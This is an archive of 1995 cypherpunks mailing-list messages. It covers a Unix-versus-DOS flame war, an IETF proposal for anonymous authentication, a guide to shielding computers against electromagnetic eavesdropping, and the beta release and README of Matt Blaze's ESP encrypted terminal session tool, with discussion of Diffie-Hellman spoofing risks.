I'd have replied in private mail, but Mr. Embarrassing here can't be
reached by mail...

anonymous-remailer@shell.portal.com says:
> Well, maybe unix gets its reputation for being hostile because of
> things like 
> 
> * many commands don't work fully (find, for example)

Haven't found a bug in find since '85.

> * a large portion choke on input that isn't "expected"

Such as?

> * many more do extremely poor input checking,

Such as?

> * the configuration files are bizarre

Yup. Shell scripts as the startup scripts for the machine are really
hard to understand. The simple list of newsgroup names to configure
the news readers are impossible to grok, too. Not.

> * different versions have commands with different options (stty
>   everything, ps -ef vs. ps -aux, etc.)

And of course, DOS has never added options to new versions of the system.

> * each version is slightly different (ever try porting a non-trivial
>   program?

Yup. Recently, I ported about 80,000 lines of code in a day. It wasn't
much of a challenge -- because I knew how to program, of course. I had
to hack some compatibility libraries, and it took about another day
and a half to back-patch the original sources so that the program
compiled without problems on both architectures.

>   Hell, look at the "config" program that comes with PERL - 80K of stuff
>   to build a make file for the flavor of UNIX you are using!)

That's because it's fully automated. Would you prefer to do the job by hand?

Remember, Unix handles things that PCs never even dreamed of -- like
endianness considerations, which you don't get if you are chained by
the ankle to one shitty processor.

> * the commands don't combine well (often uuencode + sendmail ==
>   garbage)

I've never seen that, but then again I'm just on drugs. Naturally, of
course, no DOS programs have ever crapped out.

> * many commands accept a slightly different regular expression syntax
>   than the shell does

The shell doesn't accept regular expression syntax, so this shouldn't
be the least bit surprising.

> * the commands aren't built with ease of use in mind.  For example, to
>   kill a process under unix requires that I know its process id.

Not at all true -- you can use skill, or if a process is a current job
you can do stuff in most shells like

kill %procname

> > ever hear of X windows?
> 
> X-Windows is an extreme pain to get working.  Sure, if you buy your
> unix workstation the manufacturer will pre-install it.  Just try
> setting it up from scratch.

So buy it precompiled. Lots of people sell it that way. I can't
imagine that Windows would be easy to install if you got it in source
form.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 30 Jan 95 06:09:57 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300539.VAA18044@jobe.shell.portal.com>
Message-ID: <9501301409.AA23487@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com says:
> Normal people don't give a damn if source code is available for "power
> tools" like PERL, sed, grep, wc, bc, strip, yacc, lex, puke, barf,
> etc.
> 
> They want to cut and paste their spreadsheet charts into the word
> processor they use, and email it to coworkers.

You can do that just fine under Unix. What decade are you living in?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 30 Jan 95 06:24:29 PST
To: cypherpunks@toad.com
Subject: Re: Anonymity by mechanism ?
Message-ID: <9501301420.AA06355@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


The IETF "common authentication technology" working group (the folks
behind GSSAPI and, now, basically, all application-level security
protocols on the Internet) are looking at providing first-class support
for anonymity.  Here's a recent message.

cat-ietf-request@mit.edu to join.
	/r$
---------- Begin Forwarded Message ----------
Message 173:
>From owner-cat-ietf@cam.ov.com Mon Jan 30 07:15:20 1995
Date: Mon, 30 Jan 1995 12:35:24 --100
From: danisch@ira.uka.de (Hadmut Danisch)
Message-Id: <9501301135.AA29078@elysion.iaks.ira.uka.de>
To: cat-ietf@mit.edu
Subject: Anonymity by mechanism ?
Content-Length: 1142
Status: R

Currently there is a discussion about providing anonymity. 

To avoid the problems of recognizing the name string syntax
for anonymous names and the necessity to implement the 
anonymous way into every gssapi mechanism I want to
propose the following:

- No anonymity within any gssapi mechanism except one
  special anonymous-only mechanism.

- Allow the use of distinct authentication methods for
  both sides.

If an application accepts anonymous connections, it
uses the anonymous mechanism. If it accepts non-anonymous
connections also, it chooses both the anonymous and the
non-anonymous mechanism and asks for negotiation.

If only one peer wants to be anonymous, it can use the
anonymous mechanism and the other side a non-anonymous
mechanism (e.g. an ftp-server where the client wants to
be sure to be connected to the requested server).

This makes the programmer's life easier and improves security:
A context is anonymous if and only if it was generated
by the anonymous mechanism. And the other mechanisms don't have
to be extended for anonymity.

Anonymous mechanism doesn't mean no security. Just no
authentication of the peer.

Hadmut


----------- End Forwarded Message -----------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peb@netcom.com (Paul E. Baclace)
Date: Mon, 30 Jan 95 10:03:37 PST
To: cypherpunks@toad.com
Subject: How to TEMPEST for less
Message-ID: <199501301802.KAA04185@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Here is the article on EME reduction (a.k.a TEMPEST in a colloquial
sense). This is what you do after you encrypt your sensitive 
communications, use a crypto file system and shred, soak and
blend your sensitive papers before throwing them out...

Paul E. Baclace
peb@netcom.com

----------------------------------------
Preventing Electromagnetic Eavesdropping


---------
NOTE: Even though the author of this document uses the term "TEMPEST" at
      various points, he certifies that his text consists of general
      concepts to reduce electromagnetic emissions, and was not based on any
      actual TEMPEST specifications or data.  Further questions on this topic
      should be directed to the author, "grady@netcom.com".

				   -- PRIVACY Forum Moderator
---------


				Abstract

Eavesdropping on personal computers is not limited to looking over the
shoulder of the operator or physically tapping in to an Ethernet cable.
U.S. Government standards relating to the prevention of information capture
via the emission of electromagnetic radiation from computers and peripherals
are known as TEMPEST.  However, actual TEMPEST specifications are classified.
 
TEMPEST aside, there are inexpensive and easily applied means for
individuals to minimize unintentional emissions from equipment.  My document
"Preventing Electromagnetic Eavesdropping," discusses these techniques.

Grady Ward   <grady@netcom.com>

---------

Preventing Electromagnetic Eavesdropping

A note discussing the prevention of electromagnetic eavesdropping
of personal computers.

Grady Ward   <grady@netcom.com>
public key verification by PK server, finger, or by request

Version 1.0   22 March 93

TEMPEST is the code name for technology related to limiting unwanted
electromagnetic emissions from data processing and related equipment.
Its goal is to limit an opponent's capability to collect information about
the internal data flow of computer equipment. Most information concerning
TEMPEST specifications is classified by the United States Government and
is not available for use by its citizens.

The reason why TEMPEST technology is particularly important for
computers and other data processing equipment is the kinds of signals
components in a computer use to talk to each other ("square waves") and
their clock speeds (measured in megahertz) produce a particularly rich set
of unintentional signals in a wide portion of the electromagnetic spectrum.
Because the spurious emissions occupy so wide a portion of that spectrum,
technologies used to block one portion of the spectrum (as pulling the shades 
closed on a window to stop the visible light portion) are not necessarily
effective in another portion.

Unintentional emissions from a computer system can be captured and
processed to reveal information about the target systems from simple
levels of activity to even remotely copying keystrokes or capturing
monitor information. It is speculated that poorly protected systems can
be effectively monitored up to the order of one kilometer from the target
equipment.

This note will examine some practical aspects of reducing the
susceptibility of your personal computer equipment to remote monitoring
using easily-installed, widely available after-market components.


   I

One way of looking at TEMPEST from the lay person's point-of-view is
that it is virtually identical to the problem of preventing electromagnetic
interference ("EMI") by your computer system to others' radios, televisions,
or other consumer electronics. That is, preventing the emission of wide-band
radio "hash" from your computers, cabling, and peripherals both prevents
interference to you and your neighbors' television set and limits the useful
signal available to a person surreptitiously monitoring.

Viewing the problem in this light, there are quite a few useful documents
available from the government and elsewhere attacking this problem and
providing a wealth of practical solutions and resources. Very useful for the
lay person are:

Radio Frequency Interference: How to Find It and Fix It. Ed Hare, KA1CV
and Robert Schetgen, KU7G, editors
The American Radio Relay League, Newington, CT
ISBN 0-87259-375-4  (c) 1991, second printing 1992

Federal Communications Commission Interference Handbook 
(1991)
FCC Consumers Assistance Branch
Gettysburg, PA  17326
717-337-1212
and
MIL-STD-188-124B in preparation
(includes information on military shielding of tactical 
communications systems)
Superintendent of Documents
US Government Printing Office
Washington, DC  20402
202-783-3238

Information on shielding a particular piece of consumer 
electronic equipment may be available from the:

Electronic Industries Association (EIA)
2001 Pennsylvania Ave NW
Washington, DC  20006


Preventing unintended electromagnetic emissions is a relative term.
It is not feasible to reduce to zero all unintended emissions. My personal
goal, for example, might be to reduce the amount and quality of spurious
emission until the monitoring van a kilometer away would have to be in my
front yard before it could effectively eavesdrop on my computer. Apartment
dwellers with unknown neighbors only inches away (through a wall) might
want to even more carefully adopt as many of the following suggestions as
possible since signal available for detection decreases as approximately the
inverse square of the distance from the monitoring equipment to your computer.


   II
   Start with computer equipment that meets modern standards for emission.

In the United States, the "quietest" standard for computers and peripherals
is known as the "class B" level. (Class A level is a less stringent standard
for computers to be used in a business environment.)

You want to verify that all computers and peripherals you use meet the class
B standard which permits only one-tenth the power of spurious emissions than
the class A standard. If you already own computer equipment with an FCC ID,
you can find out which standard applies. Contact the FCC Consumers Assistance
Branch at 1-717-337-1212 for details in accessing their database.

Once you own good equipment, follow the manufacturer's recommendations for
preserving the shielding integrity of the system. Don't operate the system
with the cover off and keep "slot covers" in the back of the computer in
place.


   III
   Use only shielded cable for all system interconnections.

A shielded cable surrounds the core of control wires with a metal braid or
foil to keep signals confined to that core. In the late seventies it was common
to use unshielded cable such as "ribbon" cable to connect the computer with, 
say, a diskette drive. Unshielded cable acts just like an antenna for signals
generated by your computer and peripherals. Most computer manufacturers
supply shielded cable for use with their computers in order to meet FCC
standards. Cables bought from third-parties are an unknown and should be
avoided (unless you are willing to take one apart to see for yourself!)
	
Try to avoid a "rat's nest" of wire and cabling behind your equipment and
keep all cables as short as possible. You want to reduce the length of
unintended antennas and to more easily predict the likely paths of electric
and magnetic coupling from cable to cable so that it can be more effectively
filtered.


   IV
   Block radiation from the power cord(s) into the house wiring.

Most computers have an EMI filter built into their body where the AC
line cord enters the power supply. This filter is generally insufficient to
prevent substantial re-radiation of EMI voltages back into the power wiring
of your house and neighborhood. To reduce the power retransmitted down
the AC power cords of your equipment, plug them in to special EMI filters
that are in turn plugged into the wall socket. I use a model 475-3
overvoltage and EMI filter manufactured by

Industrial Communication Engineers, Ltd.
P.O. Box 18495
Indianapolis, IN  46218-0495
1-800-ICE-COMM
ask for their package of free information sheets

(AC and other filters mentioned in this note are available from a wide
variety of sources including, for example, Radio Shack. I am enthusiastic
about ICE because of the "over-designed" quality of their equipment.
Standard disclaimers apply.)

This particular filter from ICE is specified to reduce retransmission of
EMI by a factor of at least 1000 in its high-frequency design range. Although
ideally every computer component using an AC line cord ought to be filtered,
it is especially important for the monitor and computer CPU to be filtered in
this manner as the most useful information available to opponents is believed
to come from these sources.


   V
   Block retransmitted information from entering your fax/modem or 
   telephone line.

Telephone line is generally very poorly shielded. EMI from your computer
can be retransmitted directly into the phone line through your modem or can
be unintentionally picked up by the magnetic portion of the EMI spectrum
through magnetic induction from power supplies or the yoke of your cathode
ray tube "CRT" monitor.

To prevent direct retransmission, EMI filters are specifically designed for
modular telephone jacks to mount at the telephone or modem, and for
mounting directly at the service entrance to the house.

Sources of well-designed telephone-line filter products include ICE
(address above) and

K-COM
Box 82
Randolph, OH  44265
216-325-2110

Your phone company or telephone manufacturer may be able to supply
you with free modular filters, although the design frequencies of these
filters may not be high enough to be effective through much of the EMI 
spectrum of interest. Keep telephone lines away from power supplies of
computers or peripherals and the rear of CRTs:  the magnetic field often
associated with those devices can inductively transfer to unshielded lines
just as if the telephone line were directly electrically connected to them. 
Since this kind of coupling decreases rapidly with distance, this kind of
magnetic induction can be virtually eliminated by keeping as much distance
(several feet or more) as possible between the power supply/monitor yoke
and cabling.


   VI
   Use ferrite toroids and split beads to prevent EMI from escaping on
   the surface of your cables.

Ferrites are magnetic materials that, for certain ranges of EMI
frequencies, attenuate the EMI by causing it to spend itself in heat in
the material rather than continuing down the cable. They can be applied
without cutting the cable by snapping together a "split bead" form over
a thick cable such as a power cord or by threading thinner cable such as
telephone several times around the donut-shaped ferrite form. Every cable
leaving your monitor, computer, mouse, keyboard, and other computer
peripherals should have at least one ferrite core attenuator. Don't forget
the telephone lines from your fax, modem, telephone or the unshielded DC
power cord to your modem. Ferrites are applied as close to the EMI emitting
device as possible so as to afford the least amount of cable that can act as
an antenna for the EMI.


Good sources for ferrite split beads and toroids include

Amidon Associates, Inc.
P.O. Box 956
Torrance, CA  90508
310-763-5770
(ask for their free information sheet)

Palomar Engineers
P.O. Box 462222
Escondido, CA  92046
619-747-3343
(ask for their free RFI information sheet)

and Radio Shack.


   VII
   Other practical remedies.

Other remedies that are somewhat more difficult to correctly apply
include providing a good EMI "ground" shield for your computer equipment
and other more intrusive filters such as bypass capacitor filters.

You probably ought not to think about adding bypass capacitors unless you
are familiar with electronic circuits and digital design. While quite
effective, added improperly to the motherboard or cabling of a computer they
can "smooth out" the square wave digital waveform -- perhaps to the extent
that signals are interpreted erroneously causing mysterious "crashes" of
your system. In other cases, bypass capacitors can cause unwanted parasitic
oscillation on the transistorized output drivers of certain circuits which
could damage or destroy those circuits in the computer or peripherals. Also,
unlike ferrite toroids, adding capacitors requires actually physically
splicing them in or soldering them into circuits. This opens up the
possibility of electric shock, damage to other electronic components or
voiding the warranty on the computer equipment.

A good EMI ground is difficult to achieve. Unlike an electrical safety
ground, such as the third wire in a three-wire AC power system, the EMI
ground must operate effectively over a much wider part of the EMI spectrum.
This effectiveness is related to a quality known as electrical impedance. You
desire to reduce the impedance to as low a value as possible over the entire
range of EMI frequencies. 
	
Unlike the AC safety ground, important factors in achieving low impedance
include having as short a lead from the equipment to a good EMI earth ground
as possible (must be just a few feet); the gauge of the connecting lead (the
best EMI ground lead is not wire but woven grounding "strap" or wide copper
flashing sheets); and the physical coupling of the EMI into the actual earth
ground. An 8 ft. copper-plated ground may be fine for AC safety ground, but
may present appreciable impedance resistance to an EMI voltage. Much better
would be to connect a network of six to eight copper pipes arranged in a
six-foot diameter circle driven in a foot or two into the ground,
electrically bonded together with heavy ground strap and connected to the
equipment to be grounded via a short (at most, several feet), heavy (at
least 3/4-1" wide) ground strap.
	
If you can achieve a good EMI ground, then further shielding possibilities
open up for you such as surrounding your monitor and computer equipment in a
wire-screen Faraday cage. You want to use mesh rather than solid sheet
because you must preserve the free flow of cooling air to your equipment.
Buy aluminum (not nylon) screen netting at your local hardware store. This
netting typically comes in rolls 36" wide by several feet long. Completely
surround the equipment whose EMI you want to reduce, being careful to make
good electrical bonds between the different panels of netting and your good
earth ground. I use stainless steel nuts, bolts, and lock washers along with
special non-oxidizing electrical paste (available from Electrical
contractors supply houses or from ICE) to secure my ground strapping to my
net "cages".  A good Faraday cage will add several orders of magnitude of
EMI attenuation to your system.


   VIII
   Checking the effectiveness of your work.

It is easy to get a general feeling about the effectiveness of your EMI
shielding work with an ordinary portable AM radio. Bring it very close to
the body of your computer and its cables in turn. Ideally, you should not
hear an increased level of static. If you do hear relatively more at one
cable than at another, apply more ferrite split beads or obtain better
shielded cable for this component. The practice of determining what kind of
operating system code is executing by listening to a nearby AM radio is
definitely obsolete for a well-shielded EMI-proof system!

To get an idea of the power and scope of your magnetic field emissions, an
ordinary compass is quite sensitive in detecting fields. Bring a compass
within a few inches of the back of your monitor and see whether it is
deflected. Notice that the amount of deflection decreases rapidly with
distance. You want to keep cables away from magnetic sources about as far as
required not to see an appreciable deflection on the compass.


   VIIII
   Summary

If you start with good, shielded equipment that has passed the FCC level B
emission standard then you are off to a great start. You may even be able to
do even better with stock OEM equipment by specifying "low-emission"
monitors that have recently come on the market in response to consumer fears
of extremely low frequency ("ELF") and other electromagnetic radiation.
Consistently use shielded cables, apply filtering and ferrite toroids to all
cabling entering or leaving your computer equipment. Finally, consider a
good EMI ground and Faraday cages. Beyond this there are even more effective
means of confining the electrical and magnetic components of your system
through the use of copper foil adhesive tapes, conductive paint sprays, "mu
metal" and other less common components.


Copyright (c) 1993 by Grady Ward. All Rights Reserved.
Permission is granted for free electronic distribution.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 30 Jan 95 10:45:48 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <9501301407.AA23479@snark.imsi.com>
Message-ID: <Pine.3.89.9501301030.A25404-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Jan 1995, Perry E. Metzger wrote:

> Date: Mon, 30 Jan 1995 09:07:37 -0500
> From: Perry E. Metzger <perry@imsi.com>
> To: cypherpunks@toad.com
> Subject: Re: alt.religion.your.operating.system.sucks 
> 
> 
> I'd have replied in private mail, but Mr. Embarrassing here can't be
> reached by mail...
> 
> anonymous-remailer@shell.portal.com says:
> > Well, maybe unix gets its reputation for being hostile because of
> > things like 
> > 
> > * many commands don't work fully (find, for example)
> 
> Haven't found a bug in find since '85.
> 
> > * a large portion choke on input that isn't "expected"
> 
> Such as?

Perry,  I listed a huge number of the things that anonymous
is complaining about, under the thread heading "Even more 
holy war on unix"

I listed them precisely in response to flames like yours
challenging me to name such things.

If you ask "Such as" then someone is going to answer again.

The Holy Warriors of the Sacred Unix demand facts, then
scream like nasty children when someone answers this demand.

They say "Put up or shut up", and then send a torrent of 
savage hate mail when somebody puts up.



 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Mon, 30 Jan 95 08:01:55 PST
To: cypherpunks@toad.com
Subject: ESP Unix encrypted session protocol software
Message-ID: <9501301554.AA08155@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Folks,

I'm releasing, for experimental use, source code for a preliminary
version of my simple Unix->Unix encrypted terminal session manager,
ESP.  Basically, ESP provides a pseudo-terminal interface to a local
shell session that you can use to establish an encrypted terminal
session with another, remote machine.  (See the README file below
for usage examples).  Once the bugs are shaken out, ESP will become
part of my CFS package, which will eventually grow into a larger
suite of free, practical tools for secure internetworked computing.
At the present time, I'm just releasing a "pre-release" to small
groups, including interested folks on the cypherpunks list.

I've tested ESP under BSDI and SunOS 4.x; you'll also need RSAREF 2.0
(from rsa.com) to compile it.  You're on your own for other platforms.
This release is NOT production software; it is by no means "ready for
prime time".  It's slow (reduces bandwidth by 50% and takes 45 seconds
to start up).  The user interface needs a bit of work, and you really
have to know what's going on to make effective use of it.  Future
versions of ESP will use a more efficient encoding and will add
features like a "palmtop" mode that allows secure remote entry of
things like passwords from dumb terminals with the encryption done on
a disconnected palmtop machine.  I hope to eventually have a PC
terminal client as well.  This version, however, only supports
Unix->Unix terminal sessions.

Because of export restrictions (and a large cabal of paranoid, rabid
lawyers watching my every move), I'm not able to send ESP out of the
US or Canada or make it available by anonymous ftp.  Sorry.  If you
want a copy of the ESP-beta sources, send an Email message to
cfs@research.att.com (NOT mab@research.att.com) telling me the
following:
	- that you're in the US or Canada, and
	- that you're a US or Canadian citizen or legal permanent
	  resident, and
	- that you've read and understand the license and export
	  conditions in the README file below.

Remember, you also need to get RSAREF 2.0 to build ESP.

-matt


========================= ESP README ==============================
This is Version 0.5c (BETA) of ESP, the Encrypted Session Protocol.

 * The author of this software is Matt Blaze.
 *              Copyright (c) 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software is subject to United States export controls.
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

ESP is an encrypted session protocol layer for managing remote
encrypted sessions.  It does 1024 bit DH key exchange (from RSAREF)
and 3-des in 8bit cfb mode for the traffic encryption.  See the
man page (esp.1 in this distribution).

To compile ESP you'll need the RSAREF 2.0 library, available for free
for non-commercial use in the US and Canada from RSA Laboratories
(anonymous ftp to rsa.com for details).

Once you have RSAREF working, this distribution should compile without
problems under SunOS 4.x and BSDI; you're on your own with other platforms.

The best way to explain esp is with an example.  Here's
an encrypted session from alice to bob:

	alice$ esp
	ESP v0.5 - encrypted session protocol layer
	    by Matt Blaze, AT&T Bell Labs, January 1995
	Randomizing (takes about 45 secs)......................done
	local layer ready (run 'esp -s' on remote)
	alice$ rsh bob
	bob$ ./esp -s                                          
	ESP v0.5 - encrypted session protocol layer
	    by Matt Blaze, AT&T Bell Labs, January 1995
	Randomizing (takes about 45 secs)......................done
	remote server ready
	Starting remote side of 1024 bit key exchange.
	~~L
	Starting local key exchange.
	entering ENCRYPTED mode; type ctrl-^ to escape
	bob$
	...
	[encrypted session from alice to bob]
	...
	bob$ exit
	Press <enter> to return CLEARTEXT mode:
	bob$ exit
	alice$ 

You can also use ESP to provide an encrypted login session;
simply create a user "esp" with "esp -s -e login" as the login
shell.  (Getting this to work properly will require some tweaking
on your local system). Run esp -l on the local machine and from
there log in to the esp account on the remote machine.  Such a
configuration encrypts the real account name and password over
the network:

	alice$ esp                                  
	ESP v0.5 - encrypted session protocol layer
	    by Matt Blaze, AT&T Bell Labs, January 1995
	Randomizing (takes about 45 secs)......................done
	local layer ready (run 'esp -s' on remote)
	alice$ telnet bob
	Trying 123.45.67.12...
	Connected to bob
	Escape character is '^]'.

	bob login: esp
	ESP v0.5 - encrypted session protocol layer
	    by Matt Blaze, AT&T Bell Labs, January 1995
	Randomizing (takes about 45 secs)......................done
	remote server ready
	Starting remote side of 1024 bit key exchange.
	~~L
	Starting local key exchange.
	entering ENCRYPTED mode; type ctrl-^ to escape
	login: mab
	Password:
	bob$
	...

It's primitive and slow, but seems to work.  Comments, bug fixes,
ports to new platforms and complaints are welcome.

Matt Blaze
mab@research.att.com
(for esp or cfs questions, use cfs@research.att.com).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian Farquhar" <ianf@sydney.sgi.com>
Date: Sun, 29 Jan 95 16:03:30 PST
To: cypherpunks@toad.com
Subject: Re: CERT statement
In-Reply-To: <9501262142.AA07376@dun-dun-noodles.cam.ov.com>
Message-ID: <9501301059.ZM17103@wiley.sydney.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 26,  4:42pm, Marc Horowitz wrote:
> You're exactly right.  However, getting people to deploy real security
> systems is nearly impossible.  My company sells a kerberos system, and
> although everyone is saying they want security, nobody really
> understands what this means, and as soon as we tell them that it
> actually involves effort, they become far less interested.

To a former employer of mine, security meant using the word "security"
in as many reports as they could.  The management never committed
resources to it, and didn't seem to have a grasp of even the most
basic concepts of it, but as long as they said "security" lots of
times, they felt that they had it.

Unfortunately, this seems to be a fairly typical state of affairs
in many organisations.

						Ian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Mon, 30 Jan 95 11:33:14 PST
To: rkmoore@iol.ie
Subject: RE: "bad" government
Message-ID: <9501301933.AA27413@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Richard K. Moore

>This has always been the case throughout history - the forces of dark, of
disinformation, have always attempted to keep true power from the hands of
the people.

So why are you on the wrong side?
.............................................................

So considering the political consequences from the use of cryptography, 
as continuously elaborated upon here, what are you doing on this list  
-  learning how to achieve a libertarian ideal?

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Mon, 30 Jan 95 12:02:47 PST
To: cypherpunks@toad.com
Subject: Re: "bad" government
Message-ID: <9501302003.AA00508@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Perry E. Metzger"

Since this isn't a list for discussion of politics, I'll simply suggest 
that this isn't the right place to discuss this.
.....................................................


. . . . . because otherwise it will interfere with reading all those 
other posts on Unix.

(You're right, of course.)
    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 30 Jan 95 09:30:32 PST
To: Ed Carp <ecarp@netcom.com>
Subject: Re: PFF's Magna Carta and the new netserfs
In-Reply-To: <m0rYr8r-0004IhC@s116.slcslip.indirect.com>
Message-ID: <9501301729.AA10636@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: "Ed Carp [khijol Sysadmin]" <erc@s116.slcslip.indirect.com>
    Date: Mon, 30 Jan 1995 01:07:21 -0700 (MST)
    
    > I've never figured out why governments are made out to be so
    > bad; guns, ok, but the problems of privacy we face on this list
    > have little to do with that.  Corporations can be at least as
    > bad - extreme government leads to socialism, which often retains
    > some form of citizen-participation in decision-making; the
    > corporate state, though, is exemplified in fascism, inherently
    > much less concerned about citizen's rights.

    Extreme government leads to totalitarianism, not socialism.

This statement, as well as the one to which it is a response, confuse
decision making forces in government and government control of
economic forces.  Democratic socialism, totalitarian socialism,
democratic capitalism and totalitarian capitalism are all possible, at
least theoretically.  Moving beyond theory, one could easily claim
that no truly {democratic,totalitarian,capitalist,socialist}
society/economy has ever existed.

    Governments as a whole are seen to be "bad" because they
    invariably undermine the right of the individual to make choices
    for themselves.

Unrestrained economic powers (companies, corporations, whatever) have
the same property.  This seemed to me to be a fundamental point that
Rishab was making -- and one that is often ignored in discussions of
economic libertarianism.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 30 Jan 95 12:33:02 PST
To: cypherpunks@toad.com
Subject: DON'T READ!--I'm leaving for Monte Carlo just in time
Message-ID: <199501302031.MAA16023@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Warning! This has nothing to do with cryptography, nothing to do with
Cypherpunks, nothing to do with this list. Therefore, I'm going to
write several messages about it, each one saying it'll be my last word on
the subject. And, my "DON'T READ!" will hopefully pull in the curious
and encourage them to add their two francs, which will give me more
opportunity to expound further.

Actually, I'm lying. I'm leaving for Monte Carlo in a few hours, to
give the paper I distributed earlier. (And I'm carrying half a dozen
DATs, each capable of holding several gigabytes of data, or hundreds
of megabytes in Stego-LSB mode. And an optical disk cartridge (holding
only a measly 128 MB). I'll let you know if French customs raises an
eyebrow upon my entry to Paris--I doubt it--or if the U.S. Federales
take note of me upon my (attempted?) return to the land of the free.)

Have a good time on your Unix flame wars...but hasn't it been done
already?

I was fortunate to be in Miami last October for the apparently
interminable "logo" debate (rosy leaves on a field of cypherpunk
azure, with crossed keys triumphant), so I hope to miss this Unix vs.
DOS vs. AmigaOS vs. Warp debate. Warped, indeed.

Have fun!

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 30 Jan 95 09:42:48 PST
To: Matt Blaze <mab@research.att.com>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <9501301554.AA08155@merckx.info.att.com>
Message-ID: <Pine.SUN.3.91.950130124020.24102B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Jan 1995, Matt Blaze wrote:

> ESP is an encrypted session protocol layer for managing remote
> encrypted sessions.  It does 1024 bit DH key exchange (from RSAREF)
> and 3-des in 8bit cfb mode for the traffic encryption.

I'm curious what Matt and others think about the possibility of the DH key
exchange being spoofed by an interloper in this application. 

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Mon, 30 Jan 95 10:07:52 PST
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <Pine.SUN.3.91.950130124020.24102B-100000@thrash.src.umd.edu>
Message-ID: <9501301802.AA08512@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain



>On Mon, 30 Jan 1995, Matt Blaze wrote:
>
>> ESP is an encrypted session protocol layer for managing remote
>> encrypted sessions.  It does 1024 bit DH key exchange (from RSAREF)
>> and 3-des in 8bit cfb mode for the traffic encryption.
>
>I'm curious what Matt and others think about the possibility of the DH key
>exchange being spoofed by an interloper in this application. 
>
>-Thomas
>

Well, cryptographically speaking, it's trivial for an active attack and
probably infeasible for a passive attack.  But you knew that...

So there are two questions - first, what's the threat model for TCP/IP,
and second, what are the alternatives?

I'm not sure about the threat model.  Spoofing attacks on TCP sessions
are not exactly easy - there's a lot to do to pull it off - but not
out of the question either (as demonstrated by the recent NYT articles
and CERT advisories).  Probably the easiest way to receive packets intended
for another host is to convince the routing tables between you and your
victim to route to you instead of the real host.  I'm not aware of this
ever being done ON PURPOSE, but it's not out of the question, either.

As for the alternatives, I think the picture is pretty bleak, to tell
the truth.  The cryptographically sound way to prevent spoofing is
with authentication of the agreed key.  But for the remote host to
authenticate itself, it has to have a secret signature key.  Where to
store it?  A typical machine, especially a multi-user, unattended server
simply has no safe place to store keys.  And if you had a trusted secure key
store on the remote host, you wouldn't really need to use Diffie-Hellman
to establish the session key in the first place, since you could just
store each user's pre-established session key in advance.

At the extreme, fixing this is a Hard Problem.  In practice for establishing
a reasonably secure session, it all depends on how much you worry about a
full-blown (two way) spoofing attack against IP.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Mon, 30 Jan 95 10:12:02 PST
To: cypherpunks@toad.com
Subject: ESP -> ESM
Message-ID: <9501301814.AA08637@merckx.info.att.com>
